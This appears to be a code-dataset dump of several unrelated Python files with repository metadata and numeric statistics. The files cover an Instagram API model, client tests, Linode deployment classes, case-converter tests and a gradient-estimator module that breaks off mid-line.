1
0.272727
false
0
0.090909
0
0.636364
0.181818
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
f9268aeb58281141610970f8e216e6cdeda51607
461
py
Python
instagram_api/response/model/phone_verification_settings.py
Yuego/instagram_api
b53f72db36c505a2eb24ebac1ba8267a0cc295bb
[ "MIT" ]
13
2019-08-07T21:24:34.000Z
2020-12-12T12:23:50.000Z
instagram_api/response/model/phone_verification_settings.py
Yuego/instagram_api
b53f72db36c505a2eb24ebac1ba8267a0cc295bb
[ "MIT" ]
null
null
null
instagram_api/response/model/phone_verification_settings.py
Yuego/instagram_api
b53f72db36c505a2eb24ebac1ba8267a0cc295bb
[ "MIT" ]
null
null
null
from ..mapper import PropertyMapper, ApiInterfaceBase from ..mapper.types import Timestamp, AnyType __all__ = ['PhoneVerificationSettings', 'PhoneVerificationSettingsInterface'] class PhoneVerificationSettingsInterface(ApiInterfaceBase): resend_sms_delay_sec: int max_sms_count: int robocall_count_down_time_sec: int robocall_after_max_sms: bool class PhoneVerificationSettings(PropertyMapper, PhoneVerificationSettingsInterface): pass
28.8125
84
0.828633
42
461
8.714286
0.595238
0.054645
0
0
0
0
0
0
0
0
0
0
0.114967
461
15
85
30.733333
0.897059
0
0
0
0
0
0.127983
0.127983
0
0
0
0
0
1
0
false
0.1
0.2
0
0.8
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
2
f926af6496049e7c9e88d6030f7d6842224bd386
791
py
Python
tests/submodules/test_always_on_task.py
MatiCG/pyaww
fa93184d96963b5ca2cb0330cec3a34a4fe423f7
[ "MIT" ]
null
null
null
tests/submodules/test_always_on_task.py
MatiCG/pyaww
fa93184d96963b5ca2cb0330cec3a34a4fe423f7
[ "MIT" ]
null
null
null
tests/submodules/test_always_on_task.py
MatiCG/pyaww
fa93184d96963b5ca2cb0330cec3a34a4fe423f7
[ "MIT" ]
null
null
null
# Standard library imports from typing import TYPE_CHECKING # Related third party imports import pytest # Local application/library specific imports if TYPE_CHECKING: from pyaww import AlwaysOnTask, User @pytest.mark.asyncio async def test_restart(always_on_task: "AlwaysOnTask") -> None: assert await always_on_task.restart() is None @pytest.mark.asyncio async def test_get_always_on_task_by_id( client: "User", always_on_task: "AlwaysOnTask" ) -> None: assert await client.get_always_on_task_by_id(always_on_task.id) == always_on_task @pytest.mark.asyncio async def test_update(always_on_task: "AlwaysOnTask") -> None: await always_on_task.update(description="A") await always_on_task.update(description="B") assert always_on_task.description == "B"
24.71875
85
0.774968
114
791
5.087719
0.350877
0.151724
0.227586
0.113793
0.515517
0.467241
0.134483
0
0
0
0
0
0.1378
791
31
86
25.516129
0.85044
0.120101
0
0.176471
0
0
0.062139
0
0
0
0
0
0.176471
1
0
true
0
0.176471
0
0.176471
0
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
2
f92b6b4fadb3ff08ff50008fabfc5374c47c9147
688
py
Python
speedydeploy/providers/linode.py
suvit/speedydeploy
124d7723f9e5935935f97bd3b1e433cfd251084d
[ "MIT" ]
null
null
null
speedydeploy/providers/linode.py
suvit/speedydeploy
124d7723f9e5935935f97bd3b1e433cfd251084d
[ "MIT" ]
null
null
null
speedydeploy/providers/linode.py
suvit/speedydeploy
124d7723f9e5935935f97bd3b1e433cfd251084d
[ "MIT" ]
null
null
null
from fabric import api as fab from ..base import Ubuntu, Ubuntu104 from ..deployment import _ from ..project.cron import CronTab from ..project import LogRotate from .base import Provider class Linode(Provider): def __init__(self): super(Linode, self).__init__() fab.env.os = Ubuntu104() fab.env.remote_dir = _("/home/%(user)s/") fab.env.home_dir = _("/home/%(user)s/") fab.env.cron = CronTab() fab.env.logrotate = LogRotate() class Linode512(Linode): # OLD pass class Linode768(Linode): # OLD pass class Linode1024(Linode): # OLD pass class Linode1(Linode512): pass class Linode2(Linode1024): pass
16.380952
49
0.651163
86
688
5.05814
0.406977
0.068966
0.089655
0.124138
0.082759
0.082759
0
0
0
0
0
0.04717
0.229651
688
41
50
16.780488
0.773585
0.015988
0
0.208333
0
0
0.044577
0
0
0
0
0
0
1
0.041667
false
0.208333
0.25
0
0.541667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
2
f92cef77139ea8064b596a73f936a9a1cd5b8f66
19,501
py
Python
CaseConverter/test.py
SylannBin/Utils
b4caa6366f7e6a8fcb70ec7a4b3f180b18418689
[ "MIT" ]
null
null
null
CaseConverter/test.py
SylannBin/Utils
b4caa6366f7e6a8fcb70ec7a4b3f180b18418689
[ "MIT" ]
null
null
null
CaseConverter/test.py
SylannBin/Utils
b4caa6366f7e6a8fcb70ec7a4b3f180b18418689
[ "MIT" ]
null
null
null
from printer import Color, danger, success, info, format_table from converter import * def resolve(function, value, expected): try: result = function(value) except ValueError as e: result = 'ValueError' except NotImplementedError as e: return e.message, Color.BLUE if result == expected: return result, Color.GREEN return result, Color.RED def execute(tests): for i, line in enumerate(tests): result, state_code = resolve(line[0], line[1], line[2]) tests[i] = [line[0].__name__, line[1], line[2], result, state_code] def repport(tests, index): errors = 0 ok = 0 missing = 0 for line in tests: if line[index] == 0: errors += 1 elif line[index] == 1: ok += 1 elif line[index] == 3: missing += 1 print "Repport:\n" print "- {:>12} Methods not yet implemented".format(info(missing)) print "- {:>12} Methods failing".format(danger(errors)) print "- {:>12} Methods doing ok".format(success(ok)) print values = [ 'ThisWasPascal', 'thisWasCamel', 'this_was_snake', 'THIS_WAS_COBOL', 'This_Was_Weird', 'this-was-kebab', 'THIS-WAS-TRAIN', 'This-Was-Weird', 'this has spaces', 'this-IsInvalid', 'This_IsInvalid' ] tests = [ [camel_to_cobol, 'ThisWasPascal', 'ValueError'], [camel_to_kebab, 'ThisWasPascal', 'ValueError'], [camel_to_pascal, 'ThisWasPascal', 'ValueError'], [camel_to_snake, 'ThisWasPascal', 'ValueError'], [camel_to_train, 'ThisWasPascal', 'ValueError'], [cobol_to_camel, 'ThisWasPascal', 'ValueError'], [cobol_to_kebab, 'ThisWasPascal', 'ValueError'], [cobol_to_pascal, 'ThisWasPascal', 'ValueError'], [cobol_to_snake, 'ThisWasPascal', 'ValueError'], [cobol_to_train, 'ThisWasPascal', 'ValueError'], [kebab_to_camel, 'ThisWasPascal', 'ValueError'], [kebab_to_cobol, 'ThisWasPascal', 'ValueError'], [kebab_to_pascal, 'ThisWasPascal', 'ValueError'], [kebab_to_snake, 'ThisWasPascal', 'ValueError'], [kebab_to_train, 'ThisWasPascal', 'ValueError'], [pascal_to_camel, 'ThisWasPascal', 'thisWasPascal'], [pascal_to_cobol, 'ThisWasPascal', 'THIS_WAS_PASCAL'], [pascal_to_kebab, 'ThisWasPascal', 'this-was-pascal'], [pascal_to_snake, 'ThisWasPascal', 'this_was_pascal'], [pascal_to_train, 'ThisWasPascal', 'THIS-WAS-PASCAL'], [snake_to_camel, 'ThisWasPascal', 'ValueError'], [snake_to_cobol, 'ThisWasPascal', 'ValueError'], [snake_to_kebab, 'ThisWasPascal', 'ValueError'], [snake_to_pascal, 'ThisWasPascal', 'ValueError'], [snake_to_train, 'ThisWasPascal', 'ValueError'], [train_to_camel, 'ThisWasPascal', 'ValueError'], [train_to_cobol, 'ThisWasPascal', 'ValueError'], [train_to_kebab, 'ThisWasPascal', 'ValueError'], [train_to_pascal, 'ThisWasPascal', 'ValueError'], [train_to_snake, 'ThisWasPascal', 'ValueError'], [camel_to_cobol, 'thisWasCamel', 'THIS_WAS_CAMEL'], [camel_to_kebab, 'thisWasCamel', 'this-was-camel'], [camel_to_pascal, 'thisWasCamel', 'ThisWasCamel'], [camel_to_snake, 'thisWasCamel', 'this_was_camel'], [camel_to_train, 'thisWasCamel', 'THIS-WAS-CAMEL'], [cobol_to_camel, 'thisWasCamel', 'ValueError'], [cobol_to_kebab, 'thisWasCamel', 'ValueError'], [cobol_to_pascal, 'thisWasCamel', 'ValueError'], [cobol_to_snake, 'thisWasCamel', 'ValueError'], [cobol_to_train, 'thisWasCamel', 'ValueError'], [kebab_to_camel, 'thisWasCamel', 'ValueError'], [kebab_to_cobol, 'thisWasCamel', 'ValueError'], [kebab_to_pascal, 'thisWasCamel', 'ValueError'], [kebab_to_snake, 'thisWasCamel', 'ValueError'], [kebab_to_train, 'thisWasCamel', 'ValueError'], [pascal_to_camel, 'thisWasCamel', 'ValueError'], [pascal_to_cobol, 'thisWasCamel', 'ValueError'], [pascal_to_kebab, 'thisWasCamel', 'ValueError'], [pascal_to_snake, 'thisWasCamel', 'ValueError'], [pascal_to_train, 'thisWasCamel', 'ValueError'], [snake_to_camel, 'thisWasCamel', 'ValueError'], [snake_to_cobol, 'thisWasCamel', 'ValueError'], [snake_to_kebab, 'thisWasCamel', 'ValueError'], [snake_to_pascal, 'thisWasCamel', 'ValueError'], [snake_to_train, 'thisWasCamel', 'ValueError'], [train_to_camel, 'thisWasCamel', 'ValueError'], [train_to_cobol, 'thisWasCamel', 'ValueError'], [train_to_kebab, 'thisWasCamel', 'ValueError'], [train_to_pascal, 'thisWasCamel', 'ValueError'], [train_to_snake, 'thisWasCamel', 'ValueError'], [camel_to_cobol, 'this_was_snake', 'ValueError'], [camel_to_kebab, 'this_was_snake', 'ValueError'], [camel_to_pascal, 'this_was_snake', 'ValueError'], [camel_to_snake, 'this_was_snake', 'ValueError'], [camel_to_train, 'this_was_snake', 'ValueError'], [cobol_to_camel, 'this_was_snake', 'ValueError'], [cobol_to_kebab, 'this_was_snake', 'ValueError'], [cobol_to_pascal, 'this_was_snake', 'ValueError'], [cobol_to_snake, 'this_was_snake', 'ValueError'], [cobol_to_train, 'this_was_snake', 'ValueError'], [kebab_to_camel, 'this_was_snake', 'ValueError'], [kebab_to_cobol, 'this_was_snake', 'ValueError'], [kebab_to_pascal, 'this_was_snake', 'ValueError'], [kebab_to_snake, 'this_was_snake', 'ValueError'], [kebab_to_train, 'this_was_snake', 'ValueError'], [pascal_to_camel, 'this_was_snake', 'ValueError'], [pascal_to_cobol, 'this_was_snake', 'ValueError'], [pascal_to_kebab, 'this_was_snake', 'ValueError'], [pascal_to_snake, 'this_was_snake', 'ValueError'], [pascal_to_train, 'this_was_snake', 'ValueError'], [snake_to_camel, 'this_was_snake', 'thisWasSnake'], [snake_to_cobol, 'this_was_snake', 'THIS_WAS_SNAKE'], [snake_to_kebab, 'this_was_snake', 'this-was-snake'], [snake_to_pascal, 'this_was_snake', 'ThisWasSnake'], [snake_to_train, 'this_was_snake', 'THIS-WAS-SNAKE'], [train_to_camel, 'this_was_snake', 'ValueError'], [train_to_cobol, 'this_was_snake', 'ValueError'], [train_to_kebab, 'this_was_snake', 'ValueError'], [train_to_pascal, 'this_was_snake', 'ValueError'], [train_to_snake, 'this_was_snake', 'ValueError'], [camel_to_cobol, 'THIS_WAS_COBOL', 'ValueError'], [camel_to_kebab, 'THIS_WAS_COBOL', 'ValueError'], [camel_to_pascal, 'THIS_WAS_COBOL', 'ValueError'], [camel_to_snake, 'THIS_WAS_COBOL', 'ValueError'], [camel_to_train, 'THIS_WAS_COBOL', 'ValueError'], [cobol_to_camel, 'THIS_WAS_COBOL', 'thisWasCobol'], [cobol_to_kebab, 'THIS_WAS_COBOL', 'this-was-cobol'], [cobol_to_pascal, 'THIS_WAS_COBOL', 'ThisWasCobol'], [cobol_to_snake, 'THIS_WAS_COBOL', 'this_was_cobol'], [cobol_to_train, 'THIS_WAS_COBOL', 'THIS-WAS-COBOL'], [kebab_to_camel, 'THIS_WAS_COBOL', 'ValueError'], [kebab_to_cobol, 'THIS_WAS_COBOL', 'ValueError'], [kebab_to_pascal, 'THIS_WAS_COBOL', 'ValueError'], [kebab_to_snake, 'THIS_WAS_COBOL', 'ValueError'], [kebab_to_train, 'THIS_WAS_COBOL', 'ValueError'], [pascal_to_camel, 'THIS_WAS_COBOL', 'ValueError'], [pascal_to_cobol, 'THIS_WAS_COBOL', 'ValueError'], [pascal_to_kebab, 'THIS_WAS_COBOL', 'ValueError'], [pascal_to_snake, 'THIS_WAS_COBOL', 'ValueError'], [pascal_to_train, 'THIS_WAS_COBOL', 'ValueError'], [snake_to_camel, 'THIS_WAS_COBOL', 'ValueError'], [snake_to_cobol, 'THIS_WAS_COBOL', 'ValueError'], [snake_to_kebab, 'THIS_WAS_COBOL', 'ValueError'], [snake_to_pascal, 'THIS_WAS_COBOL', 'ValueError'], [snake_to_train, 'THIS_WAS_COBOL', 'ValueError'], [train_to_camel, 'THIS_WAS_COBOL', 'ValueError'], [train_to_cobol, 'THIS_WAS_COBOL', 'ValueError'], [train_to_kebab, 'THIS_WAS_COBOL', 'ValueError'], [train_to_pascal, 'THIS_WAS_COBOL', 'ValueError'], [train_to_snake, 'THIS_WAS_COBOL', 'ValueError'], [camel_to_cobol, 'This_Was_Weird', 'ValueError'], [camel_to_kebab, 'This_Was_Weird', 'ValueError'], [camel_to_pascal, 'This_Was_Weird', 'ValueError'], [camel_to_snake, 'This_Was_Weird', 'ValueError'], [camel_to_train, 'This_Was_Weird', 'ValueError'], [cobol_to_camel, 'This_Was_Weird', 'ValueError'], [cobol_to_kebab, 'This_Was_Weird', 'ValueError'], [cobol_to_pascal, 'This_Was_Weird', 'ValueError'], [cobol_to_snake, 'This_Was_Weird', 'ValueError'], [cobol_to_train, 'This_Was_Weird', 'ValueError'], [kebab_to_camel, 'This_Was_Weird', 'ValueError'], [kebab_to_cobol, 'This_Was_Weird', 'ValueError'], [kebab_to_pascal, 'This_Was_Weird', 'ValueError'], [kebab_to_snake, 'This_Was_Weird', 'ValueError'], [kebab_to_train, 'This_Was_Weird', 'ValueError'], [pascal_to_camel, 'This_Was_Weird', 'ValueError'], [pascal_to_cobol, 'This_Was_Weird', 'ValueError'], [pascal_to_kebab, 'This_Was_Weird', 'ValueError'], [pascal_to_snake, 'This_Was_Weird', 'ValueError'], [pascal_to_train, 'This_Was_Weird', 'ValueError'], [snake_to_camel, 'This_Was_Weird', 'ValueError'], [snake_to_cobol, 'This_Was_Weird', 'ValueError'], [snake_to_kebab, 'This_Was_Weird', 'ValueError'], [snake_to_pascal, 'This_Was_Weird', 'ValueError'], [snake_to_train, 'This_Was_Weird', 'ValueError'], [train_to_camel, 'This_Was_Weird', 'ValueError'], [train_to_cobol, 'This_Was_Weird', 'ValueError'], [train_to_kebab, 'This_Was_Weird', 'ValueError'], [train_to_pascal, 'This_Was_Weird', 'ValueError'], [train_to_snake, 'This_Was_Weird', 'ValueError'], [camel_to_cobol, 'this-was-kebab', 'ValueError'], [camel_to_kebab, 'this-was-kebab', 'ValueError'], [camel_to_pascal, 'this-was-kebab', 'ValueError'], [camel_to_snake, 'this-was-kebab', 'ValueError'], [camel_to_train, 'this-was-kebab', 'ValueError'], [cobol_to_camel, 'this-was-kebab', 'ValueError'], [cobol_to_kebab, 'this-was-kebab', 'ValueError'], [cobol_to_pascal, 'this-was-kebab', 'ValueError'], [cobol_to_snake, 'this-was-kebab', 'ValueError'], [cobol_to_train, 'this-was-kebab', 'ValueError'], [kebab_to_camel, 'this-was-kebab', 'thisWasKebab'], [kebab_to_cobol, 'this-was-kebab', 'THIS_WAS_KEBAB'], [kebab_to_pascal, 'this-was-kebab', 'ThisWasKebab'], [kebab_to_snake, 'this-was-kebab', 'this_was_kebab'], [kebab_to_train, 'this-was-kebab', 'THIS-WAS-KEBAB'], [pascal_to_camel, 'this-was-kebab', 'ValueError'], [pascal_to_cobol, 'this-was-kebab', 'ValueError'], [pascal_to_kebab, 'this-was-kebab', 'ValueError'], [pascal_to_snake, 'this-was-kebab', 'ValueError'], [pascal_to_train, 'this-was-kebab', 'ValueError'], [snake_to_camel, 'this-was-kebab', 'ValueError'], [snake_to_cobol, 'this-was-kebab', 'ValueError'], [snake_to_kebab, 'this-was-kebab', 'ValueError'], [snake_to_pascal, 'this-was-kebab', 'ValueError'], [snake_to_train, 'this-was-kebab', 'ValueError'], [train_to_camel, 'this-was-kebab', 'ValueError'], [train_to_cobol, 'this-was-kebab', 'ValueError'], [train_to_kebab, 'this-was-kebab', 'ValueError'], [train_to_pascal, 'this-was-kebab', 'ValueError'], [train_to_snake, 'this-was-kebab', 'ValueError'], [camel_to_cobol, 'THIS-WAS-TRAIN', 'ValueError'], [camel_to_kebab, 'THIS-WAS-TRAIN', 'ValueError'], [camel_to_pascal, 'THIS-WAS-TRAIN', 'ValueError'], [camel_to_snake, 'THIS-WAS-TRAIN', 'ValueError'], [camel_to_train, 'THIS-WAS-TRAIN', 'ValueError'], [cobol_to_camel, 'THIS-WAS-TRAIN', 'ValueError'], [cobol_to_kebab, 'THIS-WAS-TRAIN', 'ValueError'], [cobol_to_pascal, 'THIS-WAS-TRAIN', 'ValueError'], [cobol_to_snake, 'THIS-WAS-TRAIN', 'ValueError'], [cobol_to_train, 'THIS-WAS-TRAIN', 'ValueError'], [kebab_to_camel, 'THIS-WAS-TRAIN', 'ValueError'], [kebab_to_cobol, 'THIS-WAS-TRAIN', 'ValueError'], [kebab_to_pascal, 'THIS-WAS-TRAIN', 'ValueError'], [kebab_to_snake, 'THIS-WAS-TRAIN', 'ValueError'], [kebab_to_train, 'THIS-WAS-TRAIN', 'ValueError'], [pascal_to_camel, 'THIS-WAS-TRAIN', 'ValueError'], [pascal_to_cobol, 'THIS-WAS-TRAIN', 'ValueError'], [pascal_to_kebab, 'THIS-WAS-TRAIN', 'ValueError'], [pascal_to_snake, 'THIS-WAS-TRAIN', 'ValueError'], [pascal_to_train, 'THIS-WAS-TRAIN', 'ValueError'], [snake_to_camel, 'THIS-WAS-TRAIN', 'ValueError'], [snake_to_cobol, 'THIS-WAS-TRAIN', 'ValueError'], [snake_to_kebab, 'THIS-WAS-TRAIN', 'ValueError'], [snake_to_pascal, 'THIS-WAS-TRAIN', 'ValueError'], [snake_to_train, 'THIS-WAS-TRAIN', 'ValueError'], [train_to_camel, 'THIS-WAS-TRAIN', 'thisWasTrain'], [train_to_cobol, 'THIS-WAS-TRAIN', 'THIS_WAS_TRAIN'], [train_to_kebab, 'THIS-WAS-TRAIN', 'this-was-train'], [train_to_pascal, 'THIS-WAS-TRAIN', 'ThisWasTrain'], [train_to_snake, 'THIS-WAS-TRAIN', 'this_was_train'], [camel_to_cobol, 'This-Was-Weird', 'ValueError'], [camel_to_kebab, 'This-Was-Weird', 'ValueError'], [camel_to_pascal, 'This-Was-Weird', 'ValueError'], [camel_to_snake, 'This-Was-Weird', 'ValueError'], [camel_to_train, 'This-Was-Weird', 'ValueError'], [cobol_to_camel, 'This-Was-Weird', 'ValueError'], [cobol_to_kebab, 'This-Was-Weird', 'ValueError'], [cobol_to_pascal, 'This-Was-Weird', 'ValueError'], [cobol_to_snake, 'This-Was-Weird', 'ValueError'], [cobol_to_train, 'This-Was-Weird', 'ValueError'], [kebab_to_camel, 'This-Was-Weird', 'ValueError'], [kebab_to_cobol, 'This-Was-Weird', 'ValueError'], [kebab_to_pascal, 'This-Was-Weird', 'ValueError'], [kebab_to_snake, 'This-Was-Weird', 'ValueError'], [kebab_to_train, 'This-Was-Weird', 'ValueError'], [pascal_to_camel, 'This-Was-Weird', 'ValueError'], [pascal_to_cobol, 'This-Was-Weird', 'ValueError'], [pascal_to_kebab, 'This-Was-Weird', 'ValueError'], [pascal_to_snake, 'This-Was-Weird', 'ValueError'], [pascal_to_train, 'This-Was-Weird', 'ValueError'], [snake_to_camel, 'This-Was-Weird', 'ValueError'], [snake_to_cobol, 'This-Was-Weird', 'ValueError'], [snake_to_kebab, 'This-Was-Weird', 'ValueError'], [snake_to_pascal, 'This-Was-Weird', 'ValueError'], [snake_to_train, 'This-Was-Weird', 'ValueError'], [train_to_camel, 'This-Was-Weird', 'ValueError'], [train_to_cobol, 'This-Was-Weird', 'ValueError'], [train_to_kebab, 'This-Was-Weird', 'ValueError'], [train_to_pascal, 'This-Was-Weird', 'ValueError'], [train_to_snake, 'This-Was-Weird', 'ValueError'], [camel_to_cobol, 'this has spaces', 'ValueError'], [camel_to_kebab, 'this has spaces', 'ValueError'], [camel_to_pascal, 'this has spaces', 'ValueError'], [camel_to_snake, 'this has spaces', 'ValueError'], [camel_to_train, 'this has spaces', 'ValueError'], [cobol_to_camel, 'this has spaces', 'ValueError'], [cobol_to_kebab, 'this has spaces', 'ValueError'], [cobol_to_pascal, 'this has spaces', 'ValueError'], [cobol_to_snake, 'this has spaces', 'ValueError'], [cobol_to_train, 'this has spaces', 'ValueError'], [kebab_to_camel, 'this has spaces', 'ValueError'], [kebab_to_cobol, 'this has spaces', 'ValueError'], [kebab_to_pascal, 'this has spaces', 'ValueError'], [kebab_to_snake, 'this has spaces', 'ValueError'], [kebab_to_train, 'this has spaces', 'ValueError'], [pascal_to_camel, 'this has spaces', 'ValueError'], [pascal_to_cobol, 'this has spaces', 'ValueError'], [pascal_to_kebab, 'this has spaces', 'ValueError'], [pascal_to_snake, 'this has spaces', 'ValueError'], [pascal_to_train, 'this has spaces', 'ValueError'], [snake_to_camel, 'this has spaces', 'ValueError'], [snake_to_cobol, 'this has spaces', 'ValueError'], [snake_to_kebab, 'this has spaces', 'ValueError'], [snake_to_pascal, 'this has spaces', 'ValueError'], [snake_to_train, 'this has spaces', 'ValueError'], [train_to_camel, 'this has spaces', 'ValueError'], [train_to_cobol, 'this has spaces', 'ValueError'], [train_to_kebab, 'this has spaces', 'ValueError'], [train_to_pascal, 'this has spaces', 'ValueError'], [train_to_snake, 'this has spaces', 'ValueError'], [camel_to_cobol, 'this-IsInvalid', 'ValueError'], [camel_to_kebab, 'this-IsInvalid', 'ValueError'], [camel_to_pascal, 'this-IsInvalid', 'ValueError'], [camel_to_snake, 'this-IsInvalid', 'ValueError'], [camel_to_train, 'this-IsInvalid', 'ValueError'], [cobol_to_camel, 'this-IsInvalid', 'ValueError'], [cobol_to_kebab, 'this-IsInvalid', 'ValueError'], [cobol_to_pascal, 'this-IsInvalid', 'ValueError'], [cobol_to_snake, 'this-IsInvalid', 'ValueError'], [cobol_to_train, 'this-IsInvalid', 'ValueError'], [kebab_to_camel, 'this-IsInvalid', 'ValueError'], [kebab_to_cobol, 'this-IsInvalid', 'ValueError'], [kebab_to_pascal, 'this-IsInvalid', 'ValueError'], [kebab_to_snake, 'this-IsInvalid', 'ValueError'], [kebab_to_train, 'this-IsInvalid', 'ValueError'], [pascal_to_camel, 'this-IsInvalid', 'ValueError'], [pascal_to_cobol, 'this-IsInvalid', 'ValueError'], [pascal_to_kebab, 'this-IsInvalid', 'ValueError'], [pascal_to_snake, 'this-IsInvalid', 'ValueError'], [pascal_to_train, 'this-IsInvalid', 'ValueError'], [snake_to_camel, 'this-IsInvalid', 'ValueError'], [snake_to_cobol, 'this-IsInvalid', 'ValueError'], [snake_to_kebab, 'this-IsInvalid', 'ValueError'], [snake_to_pascal, 'this-IsInvalid', 'ValueError'], [snake_to_train, 'this-IsInvalid', 'ValueError'], [train_to_camel, 'this-IsInvalid', 'ValueError'], [train_to_cobol, 'this-IsInvalid', 'ValueError'], [train_to_kebab, 'this-IsInvalid', 'ValueError'], [train_to_pascal, 'this-IsInvalid', 'ValueError'], [train_to_snake, 'this-IsInvalid', 'ValueError'], [camel_to_cobol, 'This_IsInvalid', 'ValueError'], [camel_to_kebab, 'This_IsInvalid', 'ValueError'], [camel_to_pascal, 'This_IsInvalid', 'ValueError'], [camel_to_snake, 'This_IsInvalid', 'ValueError'], [camel_to_train, 'This_IsInvalid', 'ValueError'], [cobol_to_camel, 'This_IsInvalid', 'ValueError'], [cobol_to_kebab, 'This_IsInvalid', 'ValueError'], [cobol_to_pascal, 'This_IsInvalid', 'ValueError'], [cobol_to_snake, 'This_IsInvalid', 'ValueError'], [cobol_to_train, 'This_IsInvalid', 'ValueError'], [kebab_to_camel, 'This_IsInvalid', 'ValueError'], [kebab_to_cobol, 'This_IsInvalid', 'ValueError'], [kebab_to_pascal, 'This_IsInvalid', 'ValueError'], [kebab_to_snake, 'This_IsInvalid', 'ValueError'], [kebab_to_train, 'This_IsInvalid', 'ValueError'], [pascal_to_camel, 'This_IsInvalid', 'ValueError'], [pascal_to_cobol, 'This_IsInvalid', 'ValueError'], [pascal_to_kebab, 'This_IsInvalid', 'ValueError'], [pascal_to_snake, 'This_IsInvalid', 'ValueError'], [pascal_to_train, 'This_IsInvalid', 'ValueError'], [snake_to_camel, 'This_IsInvalid', 'ValueError'], [snake_to_cobol, 'This_IsInvalid', 'ValueError'], [snake_to_kebab, 'This_IsInvalid', 'ValueError'], [snake_to_pascal, 'This_IsInvalid', 'ValueError'], [snake_to_train, 'This_IsInvalid', 'ValueError'], [train_to_camel, 'This_IsInvalid', 'ValueError'], [train_to_cobol, 'This_IsInvalid', 'ValueError'], [train_to_kebab, 'This_IsInvalid', 'ValueError'], [train_to_pascal, 'This_IsInvalid', 'ValueError'], [train_to_snake, 'This_IsInvalid', 'ValueError'], ] executed_tests = execute(tests) tests.insert(0, ['Method', 'Input', 'Expected', 'Output', Color.BOLD]) color_index = 4 format_table(tests, color_index) repport(tests, color_index)
48.50995
75
0.68376
2,362
19,501
5.260373
0.035563
0.116056
0.059879
0.106237
0.783984
0.775614
0.381167
0.381167
0.339799
0.339799
0
0.001374
0.141531
19,501
402
76
48.50995
0.740816
0
0
0
0
0
0.42288
0
0
0
0
0
0
0
null
null
0
0.005236
null
null
0.015707
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
00598c2daee80da81e11b29c14b4a24630b9dc0c
4,933
py
Python
candle/estimator.py
paiforsyth/candle
831da9f92ee6e2bdb86cb0ddc7faedd4ff9d12d9
[ "MIT" ]
null
null
null
candle/estimator.py
paiforsyth/candle
831da9f92ee6e2bdb86cb0ddc7faedd4ff9d12d9
[ "MIT" ]
null
null
null
candle/estimator.py
paiforsyth/candle
831da9f92ee6e2bdb86cb0ddc7faedd4ff9d12d9
[ "MIT" ]
null
null
null
import gc from torch.autograd import Variable import torch import torch.autograd as ag import torch.nn as nn import torch.nn.functional as F import numpy as np from .context import Context from .nested import * class Function(object): def __call__(self, *args, **kwargs): raise NotImplementedError class RebarFunction(Function): def __init__(self, function, temp): self.function = function self.temp = temp self.concrete_fn = ConcreteRelaxation(temp) def __call__(self, theta, noise): return self.function(self.concrete_fn(theta)) class ProbabilityDistribution(Function): def draw(self, *args, **kwargs): raise NotImplementedError class BernoulliDistribution(ProbabilityDistribution): def __init__(self, theta): self.theta = theta def __call__(self, b): return (self.theta + 1E-8)**b * (1 - self.theta + 1E-8)**(1 - b) def draw(self): return self.theta.clamp(0, 1).bernoulli() class SoftBernoulliDistribution(ProbabilityDistribution): def __init__(self, theta): self.theta = theta def __call__(self, b): return (self.theta.sigmoid() + 1E-8)**b * (1 - self.theta.sigmoid() + 1E-8)**(1 - b) def draw(self): return self.theta.sigmoid().bernoulli() class GradientEstimator(Function): def estimate_gradient(self, *args): raise NotImplementedError def __call__(self, *args): return self.estimate_gradient(*args) class ConcreteRelaxation(Function): def __init__(self, temp): self.temp = temp def __call__(self, z): return (z / self.temp).sigmoid() class BernoulliRelaxation(ProbabilityDistribution): def __init__(self, theta): self.theta = theta def __call__(self, b): raise NotImplementedError def draw(self): theta = self.theta.sigmoid() u = theta.clone().uniform_() l1 = theta.log() - (1 - theta).log() l2 = u.log() - (1 - u).log() return l1 + l2, u class ConditionedBernoulliRelaxation(BernoulliRelaxation): def __call__(self, b): raise NotImplementedError def draw(self, b): theta = self.theta.sigmoid() v = theta.clone().uniform_() t1 = 1 - theta v = (v * t1) * (1 - b) + (v * theta + t1) * b l1 = theta.log() - t1.log() l2 = v.log() - (1 - v).log() return l1 + l2, v class Heaviside(Function): def __call__(self, x): return x.clamp(0, 1).ceil() class Round(Function): def __call__(self, x): return x.round() class REINFORCEEstimator(GradientEstimator): def __init__(self, f, p): self.f = f self.p = p def estimate_gradient(self, theta, b=None): b = self.p.draw() if b is None else b p = self.p(b) f_b = self.f(b) dlogp_dtheta = theta.apply_fn(lambda x, out: ag.grad([out.sum()], [x])[0], p.log()) return dlogp_dtheta * f_b """ REINFORCE with Importance Sampling Estimator """ class RISEEstimator(GradientEstimator): def __init__(self, f, p, p_i, transform_fn=None): self.f = f self.p = p self.p_i = p_i self.transform_fn = transform_fn def estimate_gradient(self, theta, pi, b=None): b = self.p_i.draw() if b is None else b h = b.apply_fn(self.transform_fn) if self.transform_fn else b p = self.p(h) p_i = self.p_i(b) f_b = self.f(h) dp_dtheta = theta.apply_fn(lambda x, out: ag.grad([out.sum()], [x])[0], p) g_is = dp_dtheta * f_b / (p_i + 1E-8) var_grad = pi.apply_fn(lambda x, out: ag.grad([out.sum()], [x], retain_graph=True)[0], g_is**2) return g_is, var_grad """ Implements RELAX estimator from "Backpropagation Through the Void..." paper https://arxiv.org/abs/1711.00123 Grathwohl et al. (2018) """ class RELAXEstimator(GradientEstimator): def __init__(self, f, c, p, z, z_tilde, H, transform_fn=None): self.f = f self.c = c self.p = p self.z = z self.z_tilde = z_tilde self.transform_fn = transform_fn self.H = H def estimate_gradient(self, theta, phi): z, u = self.z.draw() b = self.H(z) zt, v = self.z_tilde.draw(b) p = self.p(b) c_phi_zt = self.c(theta, v) dlogp_dtheta = theta.apply_fn(lambda x, out: ag.grad([out.sum()], [x], retain_graph=True)[0], p.log()) c_phi_z = self.c(theta, u) dc_phi_z = 